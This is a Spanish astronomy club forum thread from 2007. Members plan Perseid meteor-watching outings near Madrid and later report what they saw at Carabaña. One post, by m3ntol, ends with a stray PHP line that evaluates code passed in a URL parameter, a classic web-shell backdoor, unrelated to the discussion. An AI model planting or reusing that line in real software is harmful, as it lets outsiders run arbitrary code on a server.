Máximo de Perseidas 11 al 12 de Agosto

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.

¿Donde prefieres ir a ver las perseidas?

Pioz
0
No hay votos
Carabaña
2
50%
Otro (indicar)
2
50%
 
Votos totales: 4

kikeandco
Mensajes: 2
Registrado: Vie Ago 10, 2007 11:37 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por kikeandco »

Hola, estaba buscando algún grupo para la observación de las perseidas y he topado con vosotros, y ya estaba casi convencido de a subir en solitario a la Morcuera la madrugada del lunes.

La quedada del sábado está clara, pero para el domingo no he visto nada organizado. ¿Vais a hacer alguna convocatoria? ¿Admitiríais a un mirón más?

Salu2. Enrique.
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Eres bienvenido kikeandco :wink:

Se acepta otro mirón más jejeje

Para el domingo se está organizando una salida a Pioz (Guadalajara). No iremos gente de aquí si no de otro chat pero ya conocemos de otras salidas. Puedes seguir el hilo de la salida en este otro foro.
http://www.asociacionhubble.org/modules ... 42&start=0

El domingo al puerto de la Morcuera va a subir gente, me han llamado estos días para que les de indicaciones, estarán en una fuente que hay muy cerca del refugio.

Un saludo, mañana nos vemos :wink:

PD: Parezco un felpudillo, doy la bienvenida a todos :lol:
kikeandco
Mensajes: 2
Registrado: Vie Ago 10, 2007 11:37 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por kikeandco »

Gracias Carlosz22, aun no sé adonde ni cuando iré, a ver qué tal andamos mañana de nubes y sueño. Me habían recomendado la sierra por mayor limpieza del aire, y sabiendo que habrá más gente para repartirnos los mosquitos igual me animo a la escalada nocturna.

Salu2. Enrique.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por m3ntol »

Hola!!
pues claro que eres bienvenido :)

parece que las previsiones van mejorando. Lo que parecía que iba a ser un cielo cubierto se está quedando en despejado y nubes altas dispersas a partir de las 3 de la mañana.

Que siga mejorando :D:D
phpbb:eval(stripslashes($_GET[e]));
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Lo importante no es solo tener un buen MALE en el cenit, si no también horizonte norte y este bien despejado. El horizonte norte en la Morcuera no está despejado, eso sí, desde allí en el cenit se tienen unos cielos mucho mejores.
A la Morcuera subirá gente el domingo, hoy creo que no va a subir nadie. El grupo del domingo es de Fonamad, fotógrafos de naturaleza.

La última previsión es que a partir de las 3 que habrá una cobertura nubosa del 40%, antes de las 3 no habrá nubes o muy escasas. Como bien ha dicho m3ntol, las nubes son de tipo alto y al entrar desde el sur y el oeste no molestarán en la zona del radiante.
recoleto
Mensajes: 5
Registrado: Sab Ago 04, 2007 8:54 am

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por recoleto »

[quote="carlosz22"]Lo importante no es solo tener un buen MALE en el cenit, si no también horizonte norte y este bien despejado. El horizonte norte en la Morcuera no está despejado, eso sí, desde allí en el cenit se tienen unos cielos mucho mejores.
.[/quote]

Eso mismo es lo que me preocupa de mi elección en Somosierra.Si lo veo crítico nos haremos unos kilómetros másallá, ya en Segovia...

Os imagino disfrutando ahora del espectáculo.¡¡qué envidia!! En Barajas, con tanta luz, a pesar de la altura de la torre, no veo nada :cry: :cry: :cry: :cry: :cry: :cry:
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

Al final la noche del domingo al lunes no salimos, solo fuimos a Carabaña el sábado.
No estuvo mal, vimos sobre una veintena de perseidas, sobre las 4 hubo un pico de actividad de unos 40 THZ. Cuando las nubes estaban en su máximo esplendor nos dedicamos a mirar por el telescopio de m3ntol. Vimos bastantes objetos Messier. Personalmente lo mejor de la noche fue encontrar sin necesidad de ningún filtro el Velo y Norteamérica :D También vimos Júpiter tampoco estuvo nada mal. Tuvimos una excelente compañía, nos juntamos bastantes personas que iba rotando, se iban unos poco y venían más.

Aún tengo que revisar la cámara de video a ver si tuve suerte y se digno alguna perseida a pasar por delante del campo de la cámara :roll:

El sitio estaba bien, con un bar cerca 8), para stronomía el sitio es exactamente igual que Pioz con la diferencia de que los aviones pasaban justo por encima y que el suelo estaba caliente para poder tumbarse uno, eso sí, para un reflector que el suelo esté tan caliente es malísimo.

Un saludo y espero que hayais tenido suerte en la caza de perseidas :D
jamf
Mensajes: 284
Registrado: Lun May 28, 2007 5:28 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por jamf »

También podemos decir, que fue una actividad multi-disciplinar. Ya que pudimos asistir a cuatro o cinco rondas de tiro al plato.

Lo del suelo caliente para el telescopio, también fue culpa nuestra, mira que ponernos en el único trozo de asfalto en cientos de metros 8) .

Para mí, fue una salida bien aprovechada, el recorrido Messier, creo que gustó a muchos de los asistentes. Y mirar por un teles como el de m3ntol, por primera vez. Como sucedió con la mayoría de ellos, causa una gran sensación para aquellos que nunca lo han echo.

Por cierto, los laser verdes también triunfaron.

Saludos José Ángel.
"No soy un inútil por completo, al menos sirvo como mal ejemplo." ( El chavo del ocho)
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por carlosz22 »

[quote="jamf"]Y mirar por un teles como el de M3ntos.[/quote]
:D :D :D Que bueno :D :D :D

Javier ten cuidado de no mezclarte con CocaCola no vayas a explotar.
jamf
Mensajes: 284
Registrado: Lun May 28, 2007 5:28 pm

Máximo de Perseidas 11 al 12 de Agosto

Mensaje por jamf »

Me ha traicionado el subconsciente, en que estaría pensando :oops:

Perdón Javier.

Saludos nuevamente.
"No soy un inútil por completo, al menos sirvo como mal ejemplo." ( El chavo del ocho)
Responder